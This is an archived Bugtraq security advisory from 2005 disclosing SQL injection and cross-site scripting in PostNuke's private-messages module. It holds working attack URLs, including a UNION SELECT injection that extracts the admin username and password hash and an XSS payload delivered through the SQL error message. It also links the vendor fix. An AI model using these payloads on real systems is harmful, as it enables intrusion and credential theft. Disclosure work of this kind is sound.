Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PostNuke Critical SQL Injection and XSS 0.750=>x

from [sp3x] Network Security [Permanent Link]
Subject: PostNuke Critical SQL Injection and XSS 0.750=>x
Date: 27 May 2005 22:37:53 -0000 


-=[ Critical SQL injection and XSS in PostNuke ]=-

Author: sp3x
Date: 27. May 2005

Affected software :
===================
PostNuke version : x=> 0.750

Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

Vulnerabilities :
*****************

Critical SQL injection :
========================

Code :
------

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
                                        $column[msg_image] AS \"msg_image\",
                                        $column[subject] AS \"subject\",
                                        $column[from_userid] AS \"from_userid\",
                                        $column[to_userid] AS \"to_userid\",
                                        $column[msg_time] AS \"msg_time\",
                                        $column[msg_text] AS \"msg_text\",
                                        $column[read_msg] AS \"read_msg\"
                        FROM $pntable[priv_msgs]
            WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . 
"'";

    $resultID =& $dbconn->SelectLimit($sql,1,$start);
    if($dbconn->ErrorNo()<>0) {
        error_log("DB Error: " . $dbconn->ErrorMsg());
        echo $dbconn->ErrorMsg() . "<br />";
        forumerror(0005);
    }
=======================

First lets login -in as user in postnuke. Then send the message to yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL
 inj]&total_messages=1

Note :
------
total_messages=1 - the id of total_messages must exist

Now you will see this error message 

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near '[SQL injection],1' at 
line 10
========================

Exploit SQL injection :
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

And we can see the admin md5 password and nick :)

Cross-site scripting - XSS :
============================

Thanks to error message we can also perform XSS attacks :)

Example :
---------

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3
 and sp3x - SecurityReason</h1>&total_messages=1

And we get :

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10
========================

How to fix :
============

PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

Greets :
========

cXIb8O3 and pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PostNuke Critical SQL Injection and XSS 0.750=>x, sp3x <=
Previous by Date:  PHP Stat Administrative User Authentication Bypass, SoulBlack Group
Next by Date:  User32.dll Icon Size Crash, - k -
Previous by Thread:  PHP Stat Administrative User Authentication Bypass, SoulBlack Group
Next by Thread:  User32.dll Icon Size Crash, - k -
Indexes:  [Date] [Thread] [Top] [All Lists]